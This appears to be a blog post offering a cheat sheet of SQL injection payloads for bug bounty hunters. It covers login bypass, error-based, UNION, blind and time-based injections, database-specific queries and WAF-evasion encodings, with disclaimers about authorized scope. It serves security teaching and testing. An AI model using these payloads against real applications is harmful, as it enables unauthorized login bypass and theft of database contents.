Wednesday, August 6, 2025

๐Ÿ’ฅ SQL Injection Payloads for Bug Bounty Hunting: A Hands-On Guide

 SQL Injection (SQLi) remains one of the most impactful web vulnerabilities — despite being known for over two decades. As a bug bounty hunter, mastering SQLi techniques can earn you serious recognition, bounties, and credibility. But responsible hacking always starts with permission. In this post, we’ll explore practical SQLi payloads you can use only on authorized targets, like those listed on platforms such as HackerOne, Bugcrowd, Synack, and YesWeHack.


๐Ÿšจ Legal Disclaimer

This blog is for educational purposes only. Do not use these techniques on systems you do not have explicit permission to test. Always respect the rules of engagement (RoE) in your bug bounty program.


๐Ÿง  What is SQL Injection?

SQL Injection occurs when an attacker is able to inject arbitrary SQL code into a backend database query. This can lead to unauthorized data access, bypassing authentication, or even full system compromise.


๐Ÿ”Ž Where to Look for SQLi?

SQLi opportunities can be found in:

  • Login forms

  • Search bars

  • Product filters

  • URL parameters

  • HTTP headers (e.g., User-Agent, Referer)

  • Cookies and hidden fields


๐Ÿงช Basic SQLi Payloads

These payloads test for simple injection points.

1
2
3
4
' OR '1'='1
' OR 1=1 --
admin' --
' OR '1'='1' --

Use these on login forms to attempt bypasses. If the app doesn’t sanitize input, you might gain unauthorized access.


๐Ÿงจ Error-Based SQLi

Use these when the server returns SQL-related error messages.

1
2
' AND 1=CAST((SELECT user()) AS INT)--
' AND (SELECT COUNT(*) FROM users) > 0--

Look for verbose error messages like:

You have an error in your SQL syntax...


๐Ÿงฎ UNION-Based SQLi

This technique attempts to merge malicious queries with legitimate ones using UNION SELECT.

1
2
' UNION SELECT null, user() --
' UNION SELECT null, database(), version() --

Use ORDER BY to find the number of columns:

1
2
' ORDER BY 1--
' ORDER BY 2--

๐Ÿ•ต️ Blind SQLi (Boolean-Based)

Ideal when the application behaves differently based on true/false conditions, even without visible errors.

1
2
3
' AND 1=1 --
' AND 1=2 --
' AND SUBSTRING(@@version,1,1)='5' --

Watch for changes in response length or content.


⏳ Time-Based Blind SQLi

Detectable via delayed responses using SLEEP() or WAITFOR DELAY.

1
2
' OR IF(1=1, SLEEP(5), 0)--
'; WAITFOR DELAY '0:0:5'--  -- (SQL Server)

Useful when no output is returned but the response delay reveals logic processing.


๐Ÿ—ƒ️ Targeting Specific Databases

MySQL

1
' UNION SELECT user(), database() --

PostgreSQL
1
' UNION SELECT current_user, version() --

SQL Server
1
' UNION SELECT system_user, @@version --

Oracle
1
' UNION SELECT banner FROM v$version --


๐Ÿงฑ Bypassing WAFs

Use encoding, case changes, or SQL comments:

1
2
3
4
%27%20OR%201=1--
' oR '1'='1
'/*!UNION*/ SELECT NULL,NULL--
%27UnIoN%20SeLeCt%20null,null--

WAFs may block obvious patterns, but these tricks can sneak past.


๐Ÿ› ️ Tools of the Trade

  • sqlmap — Automated SQLi testing tool

  • Burp Suite — With plugins like SQLiPy or Intruder for manual fuzzing

  • NoSQLMap — For MongoDB and other NoSQL targets

  • HackTricks SQLi Cheatsheet — Excellent reference


๐ŸŽฏ Pro Tips for Bounty Hunters

  • ๐Ÿ“‹ Log all payloads: Always keep a record of what you tested and how.

  • ๐Ÿ” Try every input vector: Don’t just test URLs — check headers and cookies too.

  • ๐Ÿ” Understand the app logic: Knowing how queries are structured helps tailor your payloads.

  • ๐Ÿšซ Respect the scope: Always stay within allowed domains/endpoints.


๐Ÿ Final Thoughts

SQL Injection is more than just a classic bug — it’s still a high-value target in bug bounty hunting. Understanding how and where to inject payloads can make the difference between a $0 report and a $5,000+ bounty.

Want to sharpen your skills? Try labs like:

  • PortSwigger Web Security Academy

  • Hack The Box

  • TryHackMe

Happy hunting, and stay ethical!


๐Ÿ”— Follow Me for More

๐Ÿ’ฌ Got a favorite payload or tool? Share it in the comments!

๐Ÿ“ง Subscribe for more bug bounty techniques and real-world examples.

No comments:

Post a Comment